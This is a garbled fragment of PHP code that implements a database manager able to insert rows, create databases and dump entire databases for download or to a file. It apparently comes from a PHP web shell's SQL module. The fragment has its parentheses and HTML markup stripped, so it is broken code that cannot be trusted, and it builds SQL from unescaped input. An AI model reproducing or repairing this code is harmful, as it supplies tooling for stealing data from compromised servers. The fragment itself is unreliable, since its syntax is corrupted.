= 0; foreach array_values$sql_tbl_insert as $v {if $funct = $sql_tbl_insert_functs[$akeys[$i]] {$values .= $funct." ";} $values .= "'".addslashes$v."'"; if $funct {$values .= "";} $values .= ", "; $i++;} if !empty$values {$values = substr$values,0,strlen$values-2;} $sql_query = "INSERT INTO `".$sql_tbl."` ".$keys." VALUES ".$values." ;"; $sql_act = "query"; $sql_tbl_act = "browse"; } elseif $sql_tbl_insert_radio == 2 { $set = mysql_buildwhere$sql_tbl_insert,", ",$sql_tbl_insert_functs; $sql_query = "UPDATE `".$sql_tbl."` SET ".$set." WHERE ".$sql_tbl_insert_q." LIMIT 1;"; $result = mysql_query$sql_query or printmysql_smarterror; $result = mysql_fetch_array$result, MYSQL_ASSOC; $sql_act = "query"; $sql_tbl_act = "browse"; } } if $sql_act == "query" { echo "
    "; if $submit and !$sql_query_result and $sql_confirm {if !$sql_query_error {$sql_query_error = "Query was empty";} echo "Error:
    ".$sql_query_error."
    ";} if $sql_query_result or !$sql_confirm {$sql_act = $sql_goto;} if !$submit or $sql_act {echo "
    "; if $sql_query and !$submit {echo "Do you really want to:";} else {echo "SQL-Query :";} echo "



     
    ";} } if in_array$sql_act,$acts { ?>
    Create new table:
     
    Dump DB:
    "> 
    ";} if $sql_act == "newtbl" { echo ""; if mysql_create_db $sql_newdb and !empty$sql_newdb {echo "DB "".htmlspecialchars$sql_newdb."" has been created with success!
    "; } else {echo "Can't create DB "".htmlspecialchars$sql_newdb."".
    Reason: ".mysql_smarterror;} } elseif $sql_act == "dump" { if empty$submit { $diplay = false; echo "
    SQL-Dump:

    "; echo "DB: 

    "; $v = join ";",$dmptbls; echo "Only tables explode ";" 1: 

    "; if $dump_file {$tmp = $dump_file;} else {$tmp = htmlspecialchars"./dump_".$SERVER_NAME."_".$sql_db."_".date"d-m-Y-H-i-s".".sql";} echo "File: 

    "; echo "Download:  

    "; echo "Save to file:   "; echo "



    1 - all, if empty"; echo "
    "; } else { $diplay = true; $set = array; $set["sock"] = $sql_sock; $set["db"] = $sql_db; $dump_out = "download"; $set["print"] = 0; $set["nl2br"] = 0; $set[""] = 0; $set["file"] = $dump_file; $set["add_drop"] = true; $set["onlytabs"] = array; if !empty$dmptbls {$set["onlytabs"] = explode";",$dmptbls;} $ret = mysql_dump$set; if $sql_dump_download { @ob_clean; header"Content-type: application/octet-stream"; header"Content-length: ".strlen$ret; header"Content-disposition: attachment; filename="".basename$sql_dump_file."";"; echo $ret; exit; } elseif $sql_dump_savetofile { $fp = fopen$sql_dump_file,"w"; if !$fp {echo "Dump error! Can't write to "".htmlspecialchars$sql_dump_file.""!";} else { fwrite$fp,$ret; fclose$fp; echo "Dumped! Dump has been writed to "".htmlspecialcharsrealpath$sql_dump_file."" ".view_sizefilesize$sql_dump_file."."; } } else {echo "Dump: nothing to do!";} } } if $diplay { if !empty$sql_tbl { if empty$sql_tbl_act {$sql_tbl_act = "browse";} $count = mysql_query"SELECT COUNT* FROM `".$sql_tbl."`;"; $count_row = mysql_fetch_array$count; mysql_free_result$count; $tbl_struct_result = mysql_query"SHOW FIELDS FROM `".$sql_tbl."`;"; $tbl_struct_fields = array; while $row = mysql_fetch_assoc$tbl_struct_result {$tbl_struct_fields[] = $row;} if $sql_ls > $sql_le {$sql_le = $sql_ls + $perpage;} if empty$sql_tbl_page {$sql_tbl_page = 0;} if empty$sql_tbl_ls {$sql_tbl_ls = 0;} if empty$sql_tbl_le {$sql_tbl_le = 30;} $perpage = $sql_tbl_le - $sql_tbl_ls; if !is_numeric$perpage {$perpage = 10;} $numpages = $count_row[0]/$perpage; $e = explode" ",$sql_order; if count$e == 2 { if $e[0] == "d" {$asc_desc = "DESC";} else {$asc_desc = "ASC";} $v = "ORDER BY `".$e[1]."` ".$asc_desc." "; } else {$v = "";} $query = "SELECT * FROM `".$sql_tbl."` ".$v."LIMIT ".$sql_tbl_ls." , ".$perpage.""; $result = mysql_query$query or printmysql_smarterror; echo "
    Table ".htmlspecialchars$sql_tbl." ".mysql_num_fields$result." cols and ".$count_row[0]." rows
    "; echo "Structure ]   "; echo "Browse ]   "; echo "Dump ]   "; echo "Insert ]   "; if $sql_tbl_act == "structure" {echo "

    Coming sooon!";} if $sql_tbl_act == "insert" { if !is_array$sql_tbl_insert {$sql_tbl_insert = array;} if !empty$sql_tbl_insert_radio { } else { echo "

    Inserting row into table:
    "; if !empty$sql_tbl_insert_q { $sql_query = "SELECT * FROM `".$sql_tbl."`"; $sql_query .= " WHERE".$sql_tbl_insert_q; $sql_query .= " LIMIT 1;"; $result = mysql_query$sql_query,$sql_sock or print"

    ".mysql_smarterror; $values = mysql_fetch_assoc$result; mysql_free_result$result; } else {$values = array;} echo "
    "; foreach $tbl_struct_fields as $field { $name = $field["Field"]; if empty$sql_tbl_insert_q {$v = "";} echo ""; $i++; } echo "
    Field Type Function Value
    ".htmlspecialchars$name." ".$field["Type"]."

    "; echo "

    Our Partners